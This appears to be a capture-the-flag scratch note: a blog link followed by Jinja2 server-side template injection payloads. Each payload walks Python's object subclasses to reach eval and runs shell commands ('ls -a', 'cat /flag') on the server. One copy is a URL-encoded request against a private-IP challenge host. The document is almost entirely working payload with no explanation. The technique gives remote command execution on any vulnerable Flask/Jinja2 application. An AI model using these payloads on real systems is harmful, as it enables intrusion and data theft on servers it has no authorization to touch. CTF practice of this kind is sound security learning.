https://www.cnblogs.com/chalan630/p/12578418.html
http://172.26.169.64:8171/?name={%%20for%20c%20in%20().__class__.__bases__[0].__subclasses__():%20%}%20{%%20if%20c.__name__%20==%20%27_IterationGuard%27:%20%}%20{{c.__init__.__globals__[%27__builtins__%27][%27eval%27](%22__import__(%27os%27).popen(%27cat%20/flag%27).read()%22)%20}}%20{%%20endif%20%}%20{%%20endfor%20%}


{% for c in ().__class__.__bases__[0].__subclasses__(): %}
{% if c.__name__ == '_IterationGuard': %}
{{c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls -a').read()") }}
{% endif %}
{% endfor %}


{% for c in ().__class__.__bases__[0].__subclasses__(): %}
{% if c.__name__ == '_IterationGuard': %}
{{c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat /flag').read()") }}
{% endif %}
{% endfor %}
